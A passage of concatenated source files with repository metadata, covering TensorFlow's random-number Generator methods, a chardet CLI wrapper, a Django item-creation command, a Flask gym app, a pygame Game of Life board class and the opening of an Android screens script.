      dtype: (optional) the integer type, default to uint64.
      name: (optional) the name of the node.

    Returns:
      A tensor of random numbers of the required shape.
    """
    dtype = dtypes.as_dtype(dtype)
    with ops.name_scope(name, "stateful_uniform_full_int",
                        [shape]) as name:
      shape = _shape_tensor(shape)
      return gen_stateful_random_ops.stateful_uniform_full_int(
          self.state.handle, self.algorithm, shape=shape,
          dtype=dtype, name=name)

  def binomial(self, shape, counts, probs, dtype=dtypes.int32, name=None):
    """Outputs random values from a binomial distribution.

    The generated values follow a binomial distribution with specified count and
    probability of success parameters.

    Example:

    ```python
    counts = [10., 20.]
    # Probability of success.
    probs = [0.8, 0.9]

    rng = tf.random.experimental.Generator.from_seed(234)
    binomial_samples = rng.binomial(shape=[2], counts=counts, probs=probs)
    ```

    Args:
      shape: A 1-D integer Tensor or Python array. The shape of the output
        tensor.
      counts: A 0/1-D Tensor or Python value`. The counts of the binomial
        distribution.
      probs: A 0/1-D Tensor or Python value`. The probability of success for the
        binomial distribution.
      dtype: The type of the output. Default: tf.int32
      name: A name for the operation (optional).

    Returns:
      A tensor of the specified shape filled with random binomial values.
    """
    dtype = dtypes.as_dtype(dtype)
    with ops.name_scope(name, "binomial", [shape, counts, probs]) as name:
      counts = ops.convert_to_tensor(counts, name="counts")
      probs = ops.convert_to_tensor(probs, name="probs")
      shape_tensor = _shape_tensor(shape)
      return gen_stateful_random_ops.stateful_random_binomial(
          self.state.handle,
          self.algorithm,
          shape=shape_tensor,
          counts=counts,
          probs=probs,
          dtype=dtype,
          name=name)

  # TODO(wangpeng): implement other distributions

  def _make_int64_keys(self, shape=()):
    # New independent keys are generated via
    # `new_key[i] = hash(old_key, counter+i)`, which is exactly what
    # `uniform_full_int(dtype=int64)` does for PhiloxRandom_64_128_128 and
    # ThreeFry_64_64_64.
    return self.uniform_full_int(shape=shape, dtype=dtypes.int64)

  def make_seeds(self, count=1):
    """Generates seeds for stateless random ops.

    For example:

    ```python
    seeds = get_global_generator().make_seeds(count=10)
    for i in range(10):
      seed = seeds[:, i]
      numbers = stateless_random_normal(shape=[2, 3], seed=seed)
      ...
    ```

    Args:
      count: the number of seed pairs (note that stateless random ops need a
        pair of seeds to invoke).

    Returns:
      A tensor of shape [2, count] and dtype int64.
    """
    alg = self.algorithm
    if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
      keys = self._make_int64_keys(shape=[count])
      # The two seeds for stateless random ops don't have individual semantics
      # and are scrambled together, so setting one to zero is fine.
      zeros = array_ops.zeros_like(keys)
      return array_ops.stack([keys, zeros])
    else:
      raise ValueError("Unsupported algorithm id: %s" % alg)

  def split(self, count=1):
    """Returns a list of independent `Generator` objects.

    Two generators are independent of each other in the sense that the
    random-number streams they generate don't have statistically detectable
    correlations. The new generators are also independent of the old one.
    The old generator's state will be changed (like other random-number
    generating methods), so two calls of `split` will return different
    new generators.

    For example:

    ```python
    gens = get_global_generator().split(count=10)
    for gen in gens:
      numbers = gen.normal(shape=[2, 3])
      # ...
    gens2 = get_global_generator().split(count=10)
    # gens2 will be different from gens
    ```

    The new generators will be put on the current device (possible different
    from the old generator's), for example:

    ```python
    with tf.device("/device:CPU:0"):
      gen = Generator.from_seed(1234)  # gen is on CPU
    with tf.device("/device:GPU:0"):
      gens = gen.split(count=10)  # gens are on GPU
    ```

    Args:
      count: the number of generators to return.

    Returns:
      A list (length `count`) of `Generator` objects independent of each other.
      The new generators have the same RNG algorithm as the old one.
    """
    def _key_to_state(alg, key):
      # Padding with zeros on the left. The zeros will be the counter.
      return [0] * (_get_state_size(alg) - 1) + [key]

    alg = self.algorithm
    if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
      keys = self._make_int64_keys(shape=[count])
      return [Generator(state=_key_to_state(alg, key), alg=alg)
              for key in keys.numpy()]
    else:
      raise ValueError("Unsupported algorithm id: %s" % alg)
# It's not safe to create TF ops before `init_google` is called, so this is
# initialized to None and gets a value the first time `get_global_generator`
# is called.
global_generator = None
@tf_export("random.experimental.get_global_generator")
def get_global_generator():
  """Returns the global generator, creating it lazily on first use.

  The first call initializes the generator non-deterministically; later
  calls return the same object (unless replaced via `set_global_generator`).
  """
  global global_generator
  if global_generator is None:
    global_generator = Generator.from_non_deterministic_state()
  return global_generator
@tf_export("random.experimental.set_global_generator")
def set_global_generator(generator):
  """Replaces the global generator with another `Generator` object.

  This function creates a new Generator object (and the Variable object
  within), which does not work well with tf.function because (1) tf.function
  puts restrictions on Variable creation thus reset_global_generator can't be
  freely used inside tf.function; (2) redirecting a global variable to
  a new object is problematic with tf.function because the old object may be
  captured by a 'tf.function'ed function and still be used by it.
  A 'tf.function'ed function only keeps weak references to variables,
  so deleting a variable and then calling that function again may raise an
  error, as demonstrated by
  random_test.py/RandomTest.testResetGlobalGeneratorBadWithDefun .

  Args:
    generator: the new `Generator` object.
  """
  global global_generator
  global_generator = generator
| [
"yoncho@student.42seoul.kr"
] | yoncho@student.42seoul.kr |
d6d5d5a9eba6c4cf1a0f551bde6f4c3a5002289c | 91d3aab052eb514387438c85892e308c3de5eb57 | /lambda/bin/chardetect | 606133ea8d5e21c23733b6fa0a6734ae47ffe6ed | [
"MIT"
] | permissive | piotrbelina/cloudguruchallenge-multicloud | 9188b65f5bd401c8e1cd25ec4dd645791f3fb448 | 9f55180b8d6cfced2313bc6926c261d3b0428ac5 | refs/heads/master | 2023-02-27T08:37:39.331098 | 2021-01-31T20:51:06 | 2021-01-31T20:51:06 | 334,745,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | #!/Users/piotr/PycharmProjects/acg-multicloud-2/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
    # Normalize argv[0] (strip setuptools script suffixes) before delegating
    # to chardet's CLI entry point, and propagate its exit status.
    script_name = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.argv[0] = script_name
    sys.exit(main())
| [
"belina.piotr@gmail.com"
] | belina.piotr@gmail.com | |
0dd59283c23f6efd099fab1cd91a211a9f117803 | 72697f9324ef7115177af49ef5744f438fd947a0 | /bids/management/commands/create_item.py | cff2affad5e0c105292a39254433886c1a560422 | [] | no_license | webclinic017/bidserver | 9f3a06ae516425dcb7aa9b1a40f1b62c194df8d1 | 45a45d48ed76d0855c6b70e7ecc571dee45f52e5 | refs/heads/main | 2023-03-20T08:44:30.676705 | 2021-03-22T20:45:36 | 2021-03-22T20:45:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | from django.core.management.base import BaseCommand, CommandError
from bids.models import Item
class Command(BaseCommand):
    """Management command that creates (or updates) a single Item by name."""

    help = "Creates an item"

    def add_arguments(self, parser):
        # Two required positional string arguments, in this exact order.
        for arg_name in ("name", "description"):
            parser.add_argument(arg_name, type=str)

    def handle(self, *args, **options):
        item_name = options["name"]
        # Upsert: match on name, refresh the description either way.
        Item.objects.update_or_create(
            name=item_name,
            defaults={"description": options["description"]},
        )
        message = 'Successfully created/updated item "%s"' % item_name
        self.stdout.write(self.style.SUCCESS(message))
| [
"davidespihernandez@gmail.com"
] | davidespihernandez@gmail.com |
0d17315f1da15b554d26efd323795675e81c51fd | 6c8aa0f149ef1c9136255a102f3ed45f14713590 | /app.py | aded041311e56b6a57771c29e5727e4c6da38a63 | [] | no_license | nls20/Gym_App_Project | 15da0e1a581cb54db246f57f67cc37add06f4f79 | 58305642b1029fe151cfbd25c18e1c5809aec560 | refs/heads/main | 2023-04-09T16:47:29.390092 | 2021-04-08T14:15:08 | 2021-04-08T14:15:08 | 336,502,284 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | from flask import Flask, render_template
from controllers.session_controller import sessions_blueprint
from controllers.member_controller import members_blueprint
from controllers.booking_controller import bookings_blueprint
# Create the Flask application and register the controller blueprints so
# that their session/member/booking routes are served by this app.
app = Flask(__name__)

app.register_blueprint(sessions_blueprint)
app.register_blueprint(members_blueprint)
app.register_blueprint(bookings_blueprint)
@app.route('/')
def home():
    """Render the landing page."""
    return render_template('index.html')
# Run the Flask development server (debug mode) when executed directly.
if __name__ == '__main__':
    app.run(debug=True)
"nls20@hotmail.co.uk"
] | nls20@hotmail.co.uk |
d15050aedde9ddd35d41dcb058a546c64bce086c | b60a51c6e483c2380097a4b3aba0ee0996204594 | /board.py | aa08eafdd71a9cc84a48d3ea772f7dd9659655f3 | [] | no_license | jnwjack/GameOfLife | 9f9ce2fc0a072164890326674c58ff0e67af3042 | 166ce66f18296c6810543a22577a741574fc1f7b | refs/heads/main | 2023-04-07T06:30:47.115746 | 2021-04-07T19:04:14 | 2021-04-07T19:04:14 | 352,454,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,167 | py | import pygame
from screen_object import ScreenObject
MIN_N = 1
MAX_N = 100
class Board(ScreenObject):
"""
Object that holds state of the grid as a 2D array. Also handles the drawing of the
grid onto the screen.
"""
def __init__(self, n):
self.n = n
self.rect = None
self.grid = []
self.height = 0
self.backgroundColor = (255, 255, 255)
self.top = 20
self.left = 0
self.lineColor = (0, 0, 0)
self.squareFillColor = (0, 0, 0)
self.autoPlay = False
self.delay = 25
self.tick = 0
# Store 'alive' indexes in set
self.aliveCellCoords = set()
self.origin = (0, 0)
self.offset = int(self.n / 2)
def initializeGrid(self):
# Create n x n grid
self.aliveCellCoords = set()
def calculateSize(self, screenSize):
# Height and width are equal to 75% of window height
idealHeight = int(0.75 * screenSize[1])
lineSpacing = int(idealHeight / self.n)
self.height = lineSpacing * self.n
self.left = screenSize[0]/2 - self.height/2
self.rect = pygame.Rect(self.left, self.top, self.height, self.height)
def draw(self, screen):
pygame.draw.rect(screen.surface, self.backgroundColor, self.rect)
lineSpacing = self.height / self.n
for i in range(self.n):
lineLeft = self.left + (i * lineSpacing)
# Draw vertical line
pygame.draw.line(screen.surface, self.lineColor, (lineLeft, self.top), (lineLeft, self.top + self.height))
lineTop = self.top + (i * lineSpacing)
# Draw horizontal line,
pygame.draw.line(screen.surface, self.lineColor, (self.left, lineTop), (self.left + self.height, lineTop))
# Draw horizontal and vertical lines at very end
pygame.draw.line(screen.surface, self.lineColor, (self.left + self.height, self.top), (self.left + self.height, self.top + self.height))
pygame.draw.line(screen.surface, self.lineColor, (self.left, self.top + self.height), (self.left + self.height, self.top + self.height))
# Draw 'alive' cells that are within the viewing window
for (cartesianX, cartesianY) in self.aliveCellCoords:
(indexX, indexY) = self.cartesianToBoardIndex((cartesianX, cartesianY))
# If cell is outside viewing window, skip drawing it
if(indexX < 0 or indexX >= self.n or indexY < 0 or indexY >= self.n):
continue
cellRect = pygame.Rect(self.left + (indexX * lineSpacing), self.top + (indexY * lineSpacing), lineSpacing, lineSpacing)
pygame.draw.rect(screen.surface, self.squareFillColor, cellRect)
def handleClick(self, pos):
# Mark/Unmark the clicked cell on the board
relativeX = pos[0] - self.left
relativeY = pos[1] - self.top
lineSpacing = self.height / self.n
indexX = int(relativeX / lineSpacing)
indexY = int(relativeY / lineSpacing)
(cartesianX, cartesianY) = self.boardIndexToCartesian((indexX, indexY))
if((cartesianX, cartesianY) in self.aliveCellCoords):
self.aliveCellCoords.remove((cartesianX, cartesianY))
else:
self.aliveCellCoords.add((cartesianX, cartesianY))
def handleMouseWheel(self, pos, direction):
# Zoom in/out by 10 cells, set offset to match
lineSpacing = self.height / self.n
newN = self.n + direction
if(newN <= MAX_N and newN >= MIN_N):
self.n += 10 * direction
self.offset = int(self.n / 2)
def cycle(self):
if(self.autoPlay):
self.tick += 1
if(self.tick == self.delay):
self.advanceState()
self.tick = 0
def boardIndexToCartesian(self, pos):
x = pos[0] - self.offset + self.origin[0]
y = pos[1] - self.offset + self.origin[1]
return (x, y)
def cartesianToBoardIndex(self, pos):
x = pos[0] + self.offset - self.origin[0]
y = pos[1] + self.offset - self.origin[1]
return (x, y)
def getPositionAfterWrap(self, point):
upperBound = int(MAX_N / 2)
lowerBound = upperBound * -1
if(point > upperBound):
return lowerBound
if(point < lowerBound):
return upperBound
return point
def getNeighbors(self, coords):
neighborOffsets = [
(offsetX, offsetY)
for offsetX in range(-1, 2)
for offsetY in range(-1, 2)
]
neighborOffsets.remove((0,0))
neighbors = [(self.getPositionAfterWrap(coords[0] + x), self.getPositionAfterWrap(coords[1] + y)) for (x, y) in neighborOffsets]
return neighbors
def advanceState(self):
# TODO: Implement the logic for Game of Life
nextState = set()
neighborEncounters = dict()
for coord in self.aliveCellCoords:
neighbors = self.getNeighbors(coord)
for neighbor in neighbors:
if not neighbor in neighborEncounters:
neighborEncounters[neighbor] = 1
else:
neighborEncounters[neighbor] += 1
aliveNeighbors = len([
neighbor
for neighbor in neighbors
if neighbor in self.aliveCellCoords
])
if(aliveNeighbors in set([2,3])):
nextState.add(coord)
for neighbor in neighborEncounters:
if(neighborEncounters[neighbor] == 3):
nextState.add(neighbor)
self.aliveCellCoords = nextState
| [
"jnw900@gmail.com"
] | jnw900@gmail.com |
1b60d1ceb9bfaba24c29ea19083a0b65e1a6462b | 54d0bd8b196b67e3fc29c5f3de593a1061174037 | /tests/therapy_week_test.py | eff84c3a45db2398fa83268b9ba68836aa9e9a55 | [] | no_license | dalabarda/CasparAssignment | 57d0db39e7b8e1639c9940619f368686eb5589c5 | 03dd4b897b7ad3320d8884c384d2e4b4db610b8b | refs/heads/master | 2022-11-14T12:59:43.306269 | 2020-07-05T23:24:31 | 2020-07-05T23:24:31 | 276,755,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,050 | py | import unittest
import pytest
from base.BasePage import BasePage
from pages.therapy_week_page import TherapyWeekPageTest
import utilities.CustomLogger as cl
@pytest.mark.usefixtures("beforeClass", "beforeMethod")
class TherapyWeekTest(unittest.TestCase):
@pytest.fixture(autouse=True)
def classObjects(self):
self.tp = TherapyWeekPageTest(self.driver)
self.bp = BasePage(self.driver)
@pytest.mark.run(order=1)
def test_chatWithTherapistGIF(self):
cl.allureLogs("App Launched")
self.tp.navigateToTherapyWeek()
self.tp.clickOnExercisesCard()
self.tp.clickOnTheFirstExerciseVideo()
# if self.tp.checkInfoMsg():
self.tp.clickOnYesButton()
self.tp.clickOnSettingsButton()
self.tp.clickOnMirrorSwitch()
self.tp.clickOnAllowButton()
self.tp.clickOnRecordSwitch()
self.tp.clickOnSaveSettings()
self.tp.clickOnSettingsButton()
self.tp.xxx()
#self.bp.keyCode(63)
#self.driver.press_keycode(63)
| [
"dalabarda@gmail.com"
] | dalabarda@gmail.com |
a49179e98e1e4d5547c21825f5c9fc0dc80c865d | 26fe7e861fd79b9951a81619e57caad13e88fc87 | /extractingKeyPhrases5.py | aaa25b098f47f248c50060ba8ef9f88b08b9596b | [] | no_license | eitherWei/keyPhraseExtraction | d3ff9a6a5bae5a71104435a147bb587433acdef2 | 65e932e2cb02b31f8c0eec42b1044621a7e7647a | refs/heads/master | 2020-05-20T12:32:50.285245 | 2019-06-14T07:44:47 | 2019-06-14T07:44:47 | 185,574,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,359 | py | from methods_main2 import *
import time
import pandas as pd
from collections import Counter
import sys
start = time.time()
import nltk
# import a dataset
dataset = pd.DataFrame()
# initialise methods class
path = "/Users/stephenbradshaw/Documents/codingTest/AutomaticKeyphraseExtraction-master/data/"
methods = mainMethods(path)
# extracts the files handles
methods.extractFileNames(path)
# clump of extraction methods
dataset = methods.extractFles()
#return methods.cleanSent( text)
dataset['brokenCorpus'] = methods.tokeniseCorpus(dataset)
# break being mindful of separators
dataset['stopWordRemoved'] = dataset.brokenCorpus.apply(methods.stopwordRemoval)
# returns an array of corpus : corpus = array of docs with tokenisedArrayStrings
dataset['procesedString'] = methods.cleanString(list(dataset.stopWordRemoved))
# extract the target keyPhrases and lemmatise them
dataset['targetTerms'] = methods.extractTargetTerms(dataset)
####################################################################
#posFriendlyCorpus = dataset.procesedString.apply(extractPosTags)
term_list = []
term_idf_list = []
doc_id_list = []
def buildAndProcessText(targetAmount, corpus):
for indexVal in range(targetAmount):
text = methods.extractPosTags(corpus[indexVal])
#print(text)
Text = []
for value in text:
sentArray = []
for v in value:
if v != "_":
sentArray.append(v)
if len(sentArray) > 0:
Text.append(sentArray)
print('this run is {}'.format(indexVal))
graph = methods.plotDiGraph([Text])
textRankDict = methods.computePageRank(graph)
#text = all_corpus_rejoined[indexVal]
# extract all candidate phrases
all_Phrase = []
for array in text:
all_Phrase.extend(array)
# reduct that to unique in stances
all_Phrase = list(set(all_Phrase))
# iterate over and
for phrase in all_Phrase:
phraseList = phrase.split()
if len(phraseList) > 1:
value = 0
for p in phraseList:
if p in textRankDict:
value += textRankDict[p]
value = value/len(phraseList)
textRankDict[phrase] = value
local_id_list = [ indexVal for x in range(len(textRankDict))]
local_term_list = list(textRankDict.keys())
local_term_idf_list = list(textRankDict.values())
term_list.extend(local_term_list)
term_idf_list.extend(local_term_idf_list)
doc_id_list.extend(local_id_list)
targetAmount = 211
buildAndProcessText(targetAmount, dataset['procesedString'])
#print(term_list)
df = pd.DataFrame({"doc_id_list": doc_id_list, "term_list" : term_list, "term_idf_list": term_idf_list})
indexList = methods.extractIndexLocationForAllTargetTerms(df, dataset, targetAmount, title = "indexListDf.pkl", failSafe = True)
indexValues = []
for dict1 in indexList:
indexValues.append(dict1.values())
print("size of index array {}".format(len(indexValues)))
relIndexLoc = methods.rankLocationIndex(indexValues)
methods.plotIndexResults( relIndexLoc)
#targetAmount = 1
#buildAndProcessText(targetAmount, dataset['procesedString'])
print(10*"-*-")
print((time.time() - start)/60)
| [
"noreply@github.com"
] | eitherWei.noreply@github.com |
d6e214d0a8d4d12652eee9f7bca72966d79550f4 | f9684c301ce50a6bbb5a75280cd4c70277119f27 | /yelpdetails/yelpdetails/pipelines.py | 55531cab7d87353200bd42058134f3e8878cb6be | [] | no_license | vaibhav89000/yelpdetails | 76149f2feed5cbad98b3e67d3a786223289fc1f4 | b7ce6f739a7f76fbe665e27eb097475775c0c489 | refs/heads/master | 2022-11-25T05:09:56.803075 | 2020-07-06T12:45:54 | 2020-07-06T12:45:54 | 269,969,213 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import sqlite3
class YelpdetailsPipeline(object):
    """Scrapy item pipeline that persists scraped Yelp details to SQLite.

    The `detail` table is dropped and re-created when the pipeline is
    instantiated, so every crawl starts from an empty table.

    Fix: added the `close_spider` Scrapy hook so the SQLite connection is
    committed and closed when the crawl finishes (it previously leaked).
    """

    def __init__(self):
        self.create_connection()
        self.create_table()

    def create_connection(self):
        """Open the SQLite database and keep a reusable cursor."""
        self.conn = sqlite3.connect("yelpdetails.db")
        self.curr = self.conn.cursor()

    def create_table(self):
        """Drop any previous `detail` table and create a fresh one."""
        self.curr.execute("""DROP TABLE IF EXISTS detail""")
        self.curr.execute("""create table detail(
            Name text,
            website_link text,
            website_name text,
            phone text,
            Direction text,
            category text,
            find text,
            near text,
            email text,
            website text
        )""")

    def process_item(self, item, spider):
        """Scrapy hook: store each scraped item and pass it on unchanged."""
        self.store_db(item)
        return item

    def store_db(self, item):
        """Insert one item into `detail` via a parameterized query."""
        self.curr.execute("""insert into detail values (?,?,?,?,?,?,?,?,?,?)""", (
            item['Name'],
            item['website_link'],
            item['website_name'],
            item['phone'],
            item['Direction'],
            item['category'],
            item['find'],
            item['near'],
            item['email'],
            item['website'],
        ))
        self.conn.commit()

    def close_spider(self, spider):
        """Scrapy hook: flush pending work and release the connection."""
        self.conn.commit()
        self.conn.close()
"vaibhav89000@gmail.com"
] | vaibhav89000@gmail.com |
74fc682933cb011cca980ecd739e54f9abd6589a | 1fb1f29323a3a332e7872d0bd74cfc854da6a239 | /机器学习课程/Logistic regression(iris).py | 35949c9ef955ffd2a1e0907a0e0450d5c605d2fb | [] | no_license | updu/University_code | 5691ed24e1ae2134a1fab0f1ef981ba3d0df0b54 | fb5ffaa65d728a15fa15886c18068575b58e10d7 | refs/heads/master | 2023-03-04T12:59:11.754615 | 2021-01-16T09:37:12 | 2021-01-16T09:37:12 | 267,497,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,836 | py | # -*- coding:utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import datasets
from sklearn.model_selection import train_test_split
# Load the iris dataset bundled with scikit-learn.
iris = datasets.load_iris()
# Keep only the first two features; relabel targets as binary
# (class 0 vs. everything else).
x = iris.data[:, :2]
y = (iris.target != 0) * 1
print(y)
# Scatter-plot the two classes to visualise their distribution.
plt.figure(figsize=(10, 6))
plt.scatter(x[y == 0][:, 0], x[y == 0][:, 1], color='b', label='0')
plt.scatter(x[y == 1][:, 0], x[y == 1][:, 1], color='r', label='1')
plt.legend();
# Split into training and test sets (train_test_split is already imported
# at the top of the file; this re-import is redundant but harmless).
from sklearn.model_selection import train_test_split
# x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.5)
# x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1)
# Module-level globals used by Logistic.fit below to record the loss curve.
loss_arr = []
iter_num = 0
iter_arr = []
# print(loss_arr)
class Logistic:
    """Binary logistic-regression classifier trained with batch gradient descent.

    ``fit`` appends the loss of every iteration to the module-level
    ``loss_arr`` list and prints the current loss every 1000 iterations.
    """

    def __init__(self, lr=0.01, iter_num=100000):
        # lr: learning rate; iter_num: number of gradient-descent steps.
        self.lr = lr
        self.iter_num = iter_num

    def __x_init(self, x_train):
        # Prepend a bias column of ones to the design matrix.
        bias = np.ones((x_train.shape[0], 1))
        return np.concatenate((bias, x_train), axis=1)

    def __sigmoid(self, z):
        # Logistic function mapping scores to (0, 1).
        return 1.0 / (1.0 + np.exp(-z))

    def __loss(self, h, y_train):
        # Mean binary cross-entropy.
        return (-y_train * np.log(h) - (1 - y_train) * np.log(1 - h)).mean()

    def fit(self, x_train, y_train):
        """Run batch gradient descent, storing the weights in ``self.theta``."""
        features = self.__x_init(x_train)
        self.theta = np.zeros(features.shape[1])
        for step in range(self.iter_num):
            scores = np.dot(features, self.theta)
            probs = self.__sigmoid(scores)
            gradient = np.dot(features.T, (probs - y_train) / y_train.size)
            self.theta -= self.lr * gradient
            # Re-evaluate the loss with the freshly updated weights.
            updated = self.__sigmoid(np.dot(features, self.theta))
            loss = self.__loss(updated, y_train)
            loss_arr.append(loss)
            if step % 1000 == 0:
                print(f'loss: {loss} \t')

    def predict_prob(self, x_train):
        """Return P(y=1 | x) for every row of ``x_train``."""
        return self.__sigmoid(np.dot(self.__x_init(x_train), self.theta))

    def predict(self, x_train):
        """Return hard 0/1 predictions (probability rounded at 0.5)."""
        return self.predict_prob(x_train).round()
# Train on 90% of the data for 5000 iterations and evaluate on the held-out 10%.
model = Logistic(lr=0.01, iter_num=5000)
model.fit(x_train, y_train)
preds = model.predict(x_test)
# NOTE(review): this bare expression has no effect; the accuracy is printed below.
(preds == y_test).mean()
print((preds == y_test).mean())
# Plot the loss curve recorded by fit() (one entry per iteration).
plt.figure(figsize=(10, 6))
for i in range(5000):
    iter_arr.append(i)
x = iter_arr
y = loss_arr
plt.plot(x, y)
plt.show()
"noreply@github.com"
] | updu.noreply@github.com |
a927ca2edd90ae07adf56559bbfe6b40379ae5cb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-2/f57f33a8e73d1ac10b3eb6b4333e635c1608bc27-<run>-bug.py | 8fd0e05b5b4b4ec324c3a6a1b7cf88dccfc0d38a | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py |
def run(self, tmp=None, task_vars=None):
    """Handler for fetch operations: copy a file from the remote host to
    the controller, validating checksums along the way.

    NOTE(review): this block comes from a bug-fixing corpus (pre-fix
    version); treat its behavior as suspect until compared with the fix.
    """
    if (task_vars is None):
        task_vars = dict()
    result = super(ActionModule, self).run(tmp, task_vars)
    # fetch cannot run in check mode: it would have to transfer real data.
    if self._play_context.check_mode:
        result['skipped'] = True
        result['msg'] = 'check mode not (yet) supported for this module'
        return result
    # --- argument parsing / validation -----------------------------------
    source = self._task.args.get('src', None)
    dest = self._task.args.get('dest', None)
    flat = boolean(self._task.args.get('flat'))
    fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
    # validate_md5 is the legacy alias of validate_checksum.
    validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
    if (('validate_md5' in self._task.args) and ('validate_checksum' in self._task.args)):
        result['failed'] = True
        result['msg'] = 'validate_checksum and validate_md5 cannot both be specified'
        return result
    if ((source is None) or (dest is None)):
        result['failed'] = True
        result['msg'] = 'src and dest are required'
        return result
    source = self._connection._shell.join_path(source)
    source = self._remote_expand_user(source)
    # --- remote checksum; fall back to slurp when it cannot be computed --
    # remote_checksum holds either a real checksum or a one-character error
    # code ('0'..'4', see the branch below).
    remote_checksum = None
    if (not self._play_context.become):
        remote_checksum = self._remote_checksum(source, all_vars=task_vars)
    remote_data = None
    if (remote_checksum in ('1', '2', None)):
        # file missing/unreadable or become in use: slurp the content instead.
        slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
        if slurpres.get('failed'):
            if ((not fail_on_missing) and (slurpres.get('msg').startswith('file not found') or (remote_checksum == '1'))):
                result['msg'] = 'the remote file does not exist, not transferring, ignored'
                result['file'] = source
                result['changed'] = False
            else:
                result.update(slurpres)
            return result
        else:
            if (slurpres['encoding'] == 'base64'):
                remote_data = base64.b64decode(slurpres['content'])
            if (remote_data is not None):
                remote_checksum = checksum_s(remote_data)
            # slurp may resolve a relative path; keep the canonical source.
            remote_source = slurpres.get('source')
            if (remote_source and (remote_source != source)):
                source = remote_source
    # --- compute the local destination path ------------------------------
    # A Windows remote shell joins with '\\'; normalize to forward slashes.
    if (os.path.sep not in self._connection._shell.join_path('a', '')):
        source = self._connection._shell._unquote(source)
        source_local = source.replace('\\', '/')
    else:
        source_local = source
    dest = os.path.expanduser(dest)
    if flat:
        if dest.endswith(os.sep):
            base = os.path.basename(source_local)
            dest = os.path.join(dest, base)
        if (not dest.startswith('/')):
            dest = self._loader.path_dwim(dest)
    else:
        # hierarchical layout: <dest>/<hostname>/<remote path>
        if ('inventory_hostname' in task_vars):
            target_name = task_vars['inventory_hostname']
        else:
            target_name = self._play_context.remote_addr
        dest = ('%s/%s/%s' % (self._loader.path_dwim(dest), target_name, source_local))
    dest = dest.replace('//', '/')
    # --- translate checksum error codes into task results ----------------
    if (remote_checksum in ('0', '1', '2', '3', '4')):
        if (remote_checksum == '0'):
            result['msg'] = 'unable to calculate the checksum of the remote file'
            result['file'] = source
            result['changed'] = False
        elif (remote_checksum == '1'):
            if fail_on_missing:
                result['failed'] = True
                result['msg'] = 'the remote file does not exist'
                result['file'] = source
            else:
                result['msg'] = 'the remote file does not exist, not transferring, ignored'
                result['file'] = source
                result['changed'] = False
        elif (remote_checksum == '2'):
            result['msg'] = 'no read permission on remote file, not transferring, ignored'
            result['file'] = source
            result['changed'] = False
        elif (remote_checksum == '3'):
            result['msg'] = 'remote file is a directory, fetch cannot work on directories'
            result['file'] = source
            result['changed'] = False
        elif (remote_checksum == '4'):
            result['msg'] = "python isn't present on the system. Unable to compute checksum"
            result['file'] = source
            result['changed'] = False
        return result
    # --- transfer only when the local copy differs -----------------------
    local_checksum = checksum(dest)
    if (remote_checksum != local_checksum):
        makedirs_safe(os.path.dirname(dest))
        if (remote_data is None):
            self._connection.fetch_file(source, dest)
        else:
            # content already slurped: write it out locally.
            try:
                f = open(to_bytes(dest, errors='strict'), 'w')
                f.write(remote_data)
                f.close()
            except (IOError, OSError) as e:
                raise AnsibleError(('Failed to fetch the file: %s' % e))
        new_checksum = secure_hash(dest)
        # md5 raises ValueError on FIPS-enabled systems; degrade gracefully.
        try:
            new_md5 = md5(dest)
        except ValueError:
            new_md5 = None
        if (validate_checksum and (new_checksum != remote_checksum)):
            result.update(dict(failed=True, md5sum=new_md5, msg='checksum mismatch', file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
        else:
            result.update(dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
    else:
        # local copy already up to date: report unchanged.
        try:
            local_md5 = md5(dest)
        except ValueError:
            local_md5 = None
        result.update(dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum))
    return result
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
15c905ae580067073fd0a97c8dc681b8fe2c0432 | 518c7e2514194f5c4ebe8f52a53730e447637339 | /android/ottopi/screens.py | 6a71bf37ed9ee28fbb2398f8ece57efd18278f34 | [
"Apache-2.0"
] | permissive | sergei/ottopi | 881df6dea782731a6b7c0b85bab8b1e830e65637 | 49b4639c8f7efc405e831b0a037f14b5b54351fa | refs/heads/master | 2023-07-24T07:16:32.888467 | 2023-07-22T17:07:37 | 2023-07-22T17:07:37 | 27,190,376 | 1 | 0 | NOASSERTION | 2023-03-05T20:21:41 | 2014-11-26T18:27:29 | Java | UTF-8 | Python | false | false | 990 | py | import json
import os
import sys
PIC_FORMAT = """
<div>
<p style="float: left;"><a href="{img}"><img src="{img}" width="360"></a></p>
<p>{body}</p>
